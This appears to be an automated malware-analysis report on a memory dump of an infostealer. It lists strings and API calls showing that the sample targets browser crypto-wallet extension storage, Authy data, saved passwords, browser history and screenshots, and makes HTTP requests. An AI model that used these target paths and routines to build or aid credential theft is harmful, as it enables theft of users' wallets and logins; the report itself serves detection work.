\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT, xrefs: 00406D7F
\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb, xrefs: 00406CA3
\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi, xrefs: 00408467
%s\*, xrefs: 00405A82
Authy, xrefs: 00406A1B, 00406B97
\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai, xrefs: 00406834
\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00409686
NeoLine, xrefs: 004099EC, 00409B6A
\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT, xrefs: 004074DF
Yoroi, xrefs: 00406D0B, 00406E93
\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn, xrefs: 0040A0F7
\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk, xrefs: 00409DFB
Wallets, xrefs: 00405CAC, 00405EAE, 004060B0, 004062B2, 00406442, 004065BA, 00406D26, 00406D2B, 00406D7A, 00406EAE, 0040702A, 0040719E, 00407316, 0040748E, 00407606, 0040760B, 0040765A, 0040778E, 0040790A, 00407A86, 00407BFB, 00407D7E, 00407EFA, 00408073, 004081F6, 00408372, 004084EA, 004084EF, 0040853E, 00408672, 004087FB, 0040897D, 00408AFF, 00408C81, 00408E03, 00408F85, 00409107, 00409289, 0040940B, 0040958D, 0040970F, 00409889, 00409A07, 00409B85, 00409D03, 00409E81, 00409FFF, 0040A17D
\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT, xrefs: 00406A83
\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 00406537
\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT, xrefs: 00407957
Wombat, xrefs: 00408AE4, 00408C66
Guarda, xrefs: 004078EF, 00407A6B
EQUALWallet, xrefs: 00407BD9, 00407BDE, 00407C4E, 00407D67, 00407EE3
\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00407583
\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn, xrefs: 00409F79
\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne, xrefs: 00407FEF
RoninWallet, xrefs: 004096F4, 0040986E
%s\%s, xrefs: 00405AE9
BinanceChainWallet, xrefs: 0040608F, 0040659F
\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln, xrefs: 00407A00
NiftyWallet, xrefs: 0040700F, 00407183
\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 00405BE5
\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT, xrefs: 00407DCF
MewCx, xrefs: 00408DE8, 00408F6A
\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT, xrefs: 00408848
\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT, xrefs: 004080CB
\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai, xrefs: 004066AF
\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT, xrefs: 00406BFF
\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT, xrefs: 00407C53
\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj, xrefs: 0040907E
\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac, xrefs: 00407CFC
Plugins, xrefs: 00406732, 00406737, 00406786, 004068BA, 00406A36, 00406BB2
\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj, xrefs: 00408772
Coinbase, xrefs: 004075EB, 00407773
\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT, xrefs: 00409ED2
\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT, xrefs: 00406105
GuildWallet, xrefs: 004090EC, 0040926E
\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT, xrefs: 004086BF
SaturnWallet, xrefs: 004093F0, 00409572
\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT, xrefs: 0040678B

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$_sprintf$CloseFirstH_prolog3Next_memmove$Copy__output_l
String ID: %s\%s$%s\*$Authenticator$Authy$BinanceChainWallet$BitAppWallet$CloverWallet$Coinbase$EQUALWallet$Guarda$GuildWallet$JaxxLiberty$LiqualityWallet$MathWallet$MetaMask$MewCx$NeoLine$NiftyWallet$Plugins$RoninWallet$SaturnWallet$TronLink$Wallets$Wombat$Yoroi$\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb$\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT$\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb$\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT$\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih$\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT$\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai$\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT$\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac$\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT$\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne$\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT$\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao$\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT$\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb$\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT$\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi$\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT$\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec$\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT$\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb$\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT$\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad$\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT$\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln$\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT$\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid$\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT$\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj$\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT$\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn$\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT$\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj$\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT$\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk$\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT$\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig$\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT$\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm$\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT$\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih$\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT$\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai$\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT$\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac$\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT$\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne$\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT$\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao$\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT$\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb$\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT$\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT$\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi$\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT$\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec$\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT$\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb$\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT$\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad$\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT$\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln$\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT$\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT$\Sync Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid$\Sync Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT$\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj$\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT$\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn$\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT$\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj$\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT$\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk$\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT$\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT$\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig$\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT$\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm$\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT$iWallet
API String ID: 4158272174-550326695
Opcode ID: 60e90522ae9fd7c494620146cd27bad759983f66338105e88ec45abaed92fda8
Instruction ID: 9311531beb625c380a761595c136ec9607eccc199b401a0f6b90559018a3bef4
Opcode Fuzzy Hash: 60e90522ae9fd7c494620146cd27bad759983f66338105e88ec45abaed92fda8
Instruction Fuzzy Hash: 2CA371B1804288EEDB21EFA5CD55EEE377CAF56308F00016EF909A71D1EA785B04D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 004626E9, Relevance: 131.5, APIs: 55, Strings: 20, Instructions: 242libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 004626F7
GetProcAddress.KERNEL32(00000000), ref: 00462710
GetProcAddress.KERNEL32(00000000), ref: 0046271E
LoadLibraryA.KERNEL32(00000000), ref: 0046272C
LoadLibraryA.KERNEL32 ref: 0046273A
LoadLibraryA.KERNEL32 ref: 00462749
LoadLibraryA.KERNEL32 ref: 00462757
LoadLibraryA.KERNEL32(gdi32.dll), ref: 00462764
LoadLibraryA.KERNEL32(ole32.dll), ref: 00462772
LoadLibraryA.KERNEL32(user32.dll), ref: 00462780
GetProcAddress.KERNEL32(00000000), ref: 00462794
GetProcAddress.KERNEL32(00000000), ref: 004627A6
GetProcAddress.KERNEL32(00000000), ref: 004627B8
GetProcAddress.KERNEL32(00000000), ref: 004627CA
GetProcAddress.KERNEL32(00000000), ref: 004627DC
GetProcAddress.KERNEL32(00000000), ref: 004627EE
GetProcAddress.KERNEL32(00000000), ref: 00462808
GetProcAddress.KERNEL32(00000000), ref: 0046281C
GetProcAddress.KERNEL32(00000000), ref: 00462836
GetProcAddress.KERNEL32(00000000), ref: 00462848
GetProcAddress.KERNEL32(00000000), ref: 0046285A
GetProcAddress.KERNEL32(00000000), ref: 0046286C
GetProcAddress.KERNEL32(00000000), ref: 0046287E
GetProcAddress.KERNEL32(00000000), ref: 00462890
GetProcAddress.KERNEL32(00000000), ref: 004628A2
GetProcAddress.KERNEL32(00000000), ref: 004628B4
GetProcAddress.KERNEL32(00000000), ref: 004628C6
GetProcAddress.KERNEL32(00000000), ref: 004628E0
GetProcAddress.KERNEL32(00000000), ref: 004628F2
GetProcAddress.KERNEL32(00000000), ref: 00462904
GetProcAddress.KERNEL32(00000000), ref: 00462916
GetProcAddress.KERNEL32(00000000), ref: 00462928
GetProcAddress.KERNEL32(00000000), ref: 0046293A
GetProcAddress.KERNEL32(00000000), ref: 0046294C
GetProcAddress.KERNEL32(00000000), ref: 0046295E
GetProcAddress.KERNEL32(00000000), ref: 00462970
GetProcAddress.KERNEL32(00000000), ref: 00462982
GetProcAddress.KERNEL32(00000000), ref: 00462994
GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 004629AD
GetProcAddress.KERNEL32(?,SelectObject), ref: 004629BE
GetProcAddress.KERNEL32(?,BitBlt), ref: 004629CF
GetProcAddress.KERNEL32(?,DeleteObject), ref: 004629E0
GetProcAddress.KERNEL32(?,CreateDCA), ref: 004629F1
GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 00462A02
GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 00462A13
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 00462A2C
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 00462A3F
GetProcAddress.KERNEL32(00000000,GetDesktopWindow), ref: 00462A5C
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 00462A70
GetProcAddress.KERNEL32(00000000,GetKeyboardLayoutList), ref: 00462A81
GetProcAddress.KERNEL32(00000000,CharToOemA), ref: 00462A92
GetProcAddress.KERNEL32(00000000,GetDC), ref: 00462AA3
GetProcAddress.KERNEL32(00000000,wsprintfA), ref: 00462AB4
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00462AC5
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00462AD6

Strings

CoCreateInstance, xrefs: 00462A24
DeleteObject, xrefs: 004629D5
BitBlt, xrefs: 004629C4
CharToOemA, xrefs: 00462A87
GetDeviceCaps, xrefs: 004629F7
ole32.dll, xrefs: 0046276A
SelectObject, xrefs: 004629B3
CoUninitialize, xrefs: 00462A32
GetDC, xrefs: 00462A98
user32.dll, xrefs: 00462778
CreateCompatibleBitmap, xrefs: 004629A7
CreateCompatibleDC, xrefs: 00462A08
EnumDisplayDevicesA, xrefs: 00462ABA
wsprintfA, xrefs: 00462AA9
ReleaseDC, xrefs: 00462A65
GetKeyboardLayoutList, xrefs: 00462A76
GetSystemMetrics, xrefs: 00462ACB
gdi32.dll, xrefs: 0046275D
CreateDCA, xrefs: 004629E6
GetDesktopWindow, xrefs: 00462A54

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: BitBlt$CharToOemA$CoCreateInstance$CoUninitialize$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCA$DeleteObject$EnumDisplayDevicesA$GetDC$GetDesktopWindow$GetDeviceCaps$GetKeyboardLayoutList$GetSystemMetrics$ReleaseDC$SelectObject$gdi32.dll$ole32.dll$user32.dll$wsprintfA
API String ID: 2238633743-2379150429
Opcode ID: 4610417f5ee5d2a52b906526424e16911f9cd2d082fdb5f36bdc21c1e232c309
Instruction ID: de4495144baa1624ac04cb8e555fe1289a9a557f97568fb46aef666f2f6e74dd
Opcode Fuzzy Hash: 4610417f5ee5d2a52b906526424e16911f9cd2d082fdb5f36bdc21c1e232c309
Instruction Fuzzy Hash: AAA16C75841211EFDB019FE6AE889693EB9FB3970171004BBF90292271EBB94412DF5F

Uniqueness

Uniqueness Score: -1.00%

Function 00404F13, Relevance: 56.6, APIs: 31, Strings: 1, Instructions: 602stringfileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00404F32
_memset.LIBCMT ref: 00404F61
_memset.LIBCMT ref: 00404F74
_memset.LIBCMT ref: 00404F82
_memset.LIBCMT ref: 00404F90
lstrcpyW.KERNEL32 ref: 00404FA0
lstrcatW.KERNEL32(?,\*.*), ref: 00404FB2
FindFirstFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00404FC3
lstrcpyW.KERNEL32 ref: 00404FD6
lstrcatW.KERNEL32(?,00486804), ref: 00404FE9
lstrcatW.KERNEL32(?,?), ref: 00404FFA
lstrcpyW.KERNEL32 ref: 0040500A
lstrcatW.KERNEL32(?,00486804), ref: 0040501E
lstrcatW.KERNEL32(?,?), ref: 0040502B
lstrcmpW.KERNEL32(?,00486800,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00405042
lstrcmpW.KERNEL32(?,004867F8,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00405055
PathMatchSpecW.SHLWAPI(?,00000000,?,?,00000001,00000000,?), ref: 00405120
PathMatchSpecW.SHLWAPI(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040551C

Part of subcall function 00402F8D: _memmove.LIBCMT ref: 00402FAF

Part of subcall function 00460290: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004602AB

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00405551

Part of subcall function 00461E3A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00461E6B
Part of subcall function 00461E3A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 00461E8E

FindNextFileW.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040567A
FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 0040568B
_memset.LIBCMT ref: 0040569B
_memset.LIBCMT ref: 004056A9
_memset.LIBCMT ref: 004056B7
_memset.LIBCMT ref: 004056C5
_memset.LIBCMT ref: 00405716
_memset.LIBCMT ref: 00405724
_memset.LIBCMT ref: 00405732
_memset.LIBCMT ref: 00405740
FindClose.KERNEL32(00000008,?,?,?,?,?,?,00000000,?,000003E8,00000000,00000001,00000000), ref: 0040574B

Part of subcall function 00404F13: DeleteFileW.KERNEL32(?,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,00000001,00000000), ref: 00405227

Strings

\*.*, xrefs: 00404FA6

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$lstrcat$FileFind$lstrcpy$ByteCharCloseMatchMultiPathSpecWidelstrcmp$CreateDeleteFirstH_prolog3NextUnothrow_t@std@@@__ehfuncinfo$??2@_memmove
String ID: \*.*
API String ID: 2798174453-1173974218
Opcode ID: 35613b4611af1d12080f8510816aa7d6db9f6f80026212a40ae3b534614641af
Instruction ID: a9a975aced4b9d9ca6fe8cd0df858cc36f18c231fa796d44566276dd0e8f9028
Opcode Fuzzy Hash: 35613b4611af1d12080f8510816aa7d6db9f6f80026212a40ae3b534614641af
Instruction Fuzzy Hash: BE324B7140028EAEDF21EFA5DC84EEE777CFF54309F14052BE909A6191EB389A44CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00412190, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 245libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 004121C1
GetProcAddress.KERNEL32(00000000), ref: 004121E2
GetProcAddress.KERNEL32(00000000), ref: 004121F0
GetProcAddress.KERNEL32(00000000), ref: 004121FE
GetProcAddress.KERNEL32(00000000), ref: 0041220C
GetProcAddress.KERNEL32(00000000), ref: 0041221A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,00000001,00000000,passwords.txt), ref: 00412329
_fprintf.LIBCMT ref: 0041233A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00412357
_fprintf.LIBCMT ref: 00412365
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00412385
_fprintf.LIBCMT ref: 00412396
_fprintf.LIBCMT ref: 004123C7
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 004123E8
_fprintf.LIBCMT ref: 004123F9
FreeLibrary.KERNEL32(00000000), ref: 00412457

Strings

Password: , xrefs: 004123BF
Login: %s, xrefs: 0041238E
Password: %s, xrefs: 004123F1
Host: %s, xrefs: 0041235D
Soft: %s, xrefs: 00412332
passwords.txt, xrefs: 0041229F

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc_fprintf$ByteCharMultiWide$Library$FreeLoad
String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$passwords.txt
API String ID: 1561987134-3130916318
Opcode ID: e6300e65373c509f9a1ce3e25db0ab6e4eb333436d24830e87314ae1f7d07127
Instruction ID: 4a20572128d85844788989d75c1977480bb766bc5272ee3ee2df8598a28250e5
Opcode Fuzzy Hash: e6300e65373c509f9a1ce3e25db0ab6e4eb333436d24830e87314ae1f7d07127
Instruction Fuzzy Hash: F18138B2900218AFDB10DFA6DD85DAEBBB9FB08314F14053EE415E72A1E7359941CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040A24D, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040A26C
_sprintf.LIBCMT ref: 0040A29D
FindFirstFileA.KERNELBASE(?,00000000,?,?,00000014), ref: 0040A2B0
_sprintf.LIBCMT ref: 0040A300

Part of subcall function 00468A5A: __output_l.LIBCMT ref: 00468AB5

_sprintf.LIBCMT ref: 0040A329

Part of subcall function 00468A5A: __flsbuf.LIBCMT ref: 00468AD0

_sprintf.LIBCMT ref: 0040A338
PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040A347
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A3CB
FindNextFileA.KERNELBASE(?,00000000,?,?,00000014), ref: 0040A42D
FindClose.KERNEL32(?,?,?,00000014), ref: 0040A43E

Strings

%s\%s, xrefs: 0040A2F3, 0040A2FE, 0040A336
%s\*, xrefs: 0040A297

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _sprintf$FileFind$CloseCopyFirstH_prolog3MatchNextPathSpec__flsbuf__output_l
String ID: %s\%s$%s\*
API String ID: 2813418133-2848263008
Opcode ID: de037707581fe692d91e8bce40474dc4f58db580f42c28e03cf008f803adf814
Instruction ID: 82f9decad04bab4e917dc4f009f5a493f308f6b76628a3e7d9caddb8bf6fc6a4
Opcode Fuzzy Hash: de037707581fe692d91e8bce40474dc4f58db580f42c28e03cf008f803adf814
Instruction Fuzzy Hash: CB513171900249EFDF21EFA5CC45BDE7768FB08305F10452BFA09A6281EB7997148B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B048, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 116networkfileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B052
DeleteUrlCacheEntry.WININET(?), ref: 0040B082
DeleteUrlCacheEntry.WININET(00000000), ref: 0040B0A4
InternetOpenA.WININET(004866C4,00000000,00000000,00000000,00000000), ref: 0040B0BD
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,04800000,00000000), ref: 0040B0F4
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04800000,00000000), ref: 0040B118
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040B129
InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040B147
InternetCloseHandle.WININET(00000000), ref: 0040B15B
InternetCloseHandle.WININET(00000000), ref: 0040B162
InternetCloseHandle.WININET(?), ref: 0040B16E

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

GET, xrefs: 0040B112

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle$CacheDeleteEntryHttpOpenRequest$ConnectFileH_prolog3_ReadSend_memmove
String ID: GET
API String ID: 893606432-1805413626
Opcode ID: 5a534b22061ef68b816d191cc9b21efa78b250d9decc7942754fe87cdec22290
Instruction ID: c3b1abcb992c8b5f7654b5be7816c1f133f65e6308372d0235e69025ea005b8c
Opcode Fuzzy Hash: 5a534b22061ef68b816d191cc9b21efa78b250d9decc7942754fe87cdec22290
Instruction Fuzzy Hash: A24149B1500118AFEB10EF65CC84AAE77ACFF44344F0485BAF805A7190DB749E84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412D96, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 161fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00412DEC
FindFirstFileA.KERNEL32(?,?), ref: 00412DFF
_sprintf.LIBCMT ref: 00412E50

Part of subcall function 00468A5A: __output_l.LIBCMT ref: 00468AB5

Part of subcall function 004125BF: __EH_prolog3.LIBCMT ref: 004125DE
Part of subcall function 004125BF: GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 0041260D
Part of subcall function 004125BF: lstrcatA.KERNEL32(?,\temp), ref: 0041261C
Part of subcall function 004125BF: CopyFileA.KERNEL32(?,?,00000001), ref: 00412629

Part of subcall function 0040EEA6: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040EEE6
Part of subcall function 0040EEA6: lstrcatA.KERNEL32(?,\temp), ref: 0040EEF8
Part of subcall function 0040EEA6: CopyFileA.KERNEL32(?,?,00000001), ref: 0040EF08
Part of subcall function 0040EEA6: _memset.LIBCMT ref: 0040EF16
Part of subcall function 0040EEA6: _sprintf.LIBCMT ref: 0040EF28
Part of subcall function 0040EEA6: DeleteFileA.KERNEL32(?), ref: 0040EFD2

Part of subcall function 0040EFF0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F030
Part of subcall function 0040EFF0: lstrcatA.KERNEL32(?,\temp), ref: 0040F042
Part of subcall function 0040EFF0: CopyFileA.KERNEL32(?,?,00000001), ref: 0040F052
Part of subcall function 0040EFF0: _memset.LIBCMT ref: 0040F060
Part of subcall function 0040EFF0: _sprintf.LIBCMT ref: 0040F072
Part of subcall function 0040EFF0: DeleteFileA.KERNEL32(?), ref: 0040F122

FindNextFileA.KERNEL32(?,?), ref: 00412F65
FindClose.KERNEL32(?), ref: 00412F76

Strings

%s\%s, xrefs: 00412E4A
History, xrefs: 00412EB9
%s\*, xrefs: 00412DE3

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$_sprintf$CopyCurrentDirectoryFindlstrcat$Delete_memset$CloseFirstH_prolog3Next__output_l
String ID: %s\%s$%s\*$History
API String ID: 1184990043-2206966733
Opcode ID: bd8aec016a80d798792d5ff9926ea5db1f9e8c7c26ff4931919dc8fbce70856b
Instruction ID: 1aa4ff5d384db937c50f6b477bca384b4dd3e3aa4a33c3803cac2ab7634d5304
Opcode Fuzzy Hash: bd8aec016a80d798792d5ff9926ea5db1f9e8c7c26ff4931919dc8fbce70856b
Instruction Fuzzy Hash: C0512972C0024EAECF24EFA1DD44ADE77BDEB08304F10442BF518A7161EB759665DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045F961, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0045F980
